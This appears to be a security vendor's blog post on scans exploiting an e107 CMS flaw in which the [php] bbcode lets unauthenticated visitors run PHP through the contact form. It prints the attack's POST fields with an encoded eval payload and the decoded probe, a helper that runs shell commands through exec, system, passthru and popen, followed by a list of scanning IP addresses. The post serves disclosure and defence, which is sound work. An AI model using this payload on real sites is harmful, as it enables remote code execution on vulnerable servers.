We are seeing an old vulnerability on e107 being widely scanned and exploited. e107 is a free open source content management system (CMS).
More details on the vulnerability are available here:
It was discovered that access control to the [php] bbcode which allows executing PHP code is wrongly implemented in e107. This allows unauthenticated users to execute arbitrary PHP code easily.
Affected versions
Affected is e107 <= 0.7.20 MOPS-2010-111 MOPS-2010-112
What’s it do?
So basically it allows anyone to inject an arbitrary PHP code that gets executed by the contact form. What we are seeing is a large number of scans querying for /contact.php and attemping the following POST:
[send-contactus] => 1
[author_name] => [php]eval(base64_decode(‘ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGh..
0cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKE..
…;die();[/php]
What Happens Next?
If the user is running an outdated/vulnerable version of e107, the following code gets executed:
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
What this does is it prints “echo nob0dyCr3w”, so they can come back later to compromise the site.
Addresses to Watch
In the last few days we have detected the following IP addresses scanning for this vulnerability (and the number of different sites they attemped):
92 50.28.21.169
80 200.55.136.101
71 193.254.240.175
40 88.198.21.38
29 219.121.0.60
21 69.36.94.214
19 83.222.230.44
18 122.41.36.27
16 211.234.110.168
15 219.166.139.187
14 184.107.41.155
13 175.99.88.1
10 61.177.73.92
9 211.43.205.87
9 176.9.18.253
8 80.249.166.159
7 218.188.39.39
6 91.203.111.18
6 211.233.89.252
6 148.208.211.17
5 91.196.124.204
5 83.228.162.246
5 114.255.58.182
4 78.46.97.21
4 77.93.216.212
4 70.33.254.42
4 202.150.216.211
4 178.18.19.74
4 174.121.238.67
4 109.205.138.43
3 88.198.116.159
3 88.191.131.60
3 81.0.238.89
3 59.139.30.148
3 222.122.161.173
3 218.188.39.51
3 213.175.206.162
3 212.227.119.175
3 210.127.253.75
3 210.109.103.122
3 208.113.241.117
3 206.214.218.186
3 203.71.2.73
3 203.141.152.246
3 188.72.218.187
3 176.31.242.225
3 173.193.110.102
3 130.204.12.33
3 118.163.23.187
2 95.173.183.75
2 77.93.216.208
2 69.175.79.169
2 121.125.32.67
1 94.32.66.141
1 94.102.14.36
1 91.212.74.9
1 84.124.75.46
1 81.91.83.57
1 81.3.4.126
1 78.153.202.220
1 77.223.156.34
1 77.222.40.164
1 58.120.227.170
1 49.50.8.33
1 46.137.104.221
1 222.96.156.164
1 222.231.1.50
1 209.237.150.164
1 202.29.86.7
If you have more information, or need a hand, contact Sucuri Security. Scan your site for free with Sucuri SiteCheck.
Marc Kranat
Ashley Sand
Marc-Alexandre Montpas
Ben Martin
Keir Desailly
Fioravante Souza
Gabriel Barbosa
Chase Watts
Antony Garand
Luke Leal
1 comment
Please Speak Jawa 🙂
Comments are closed.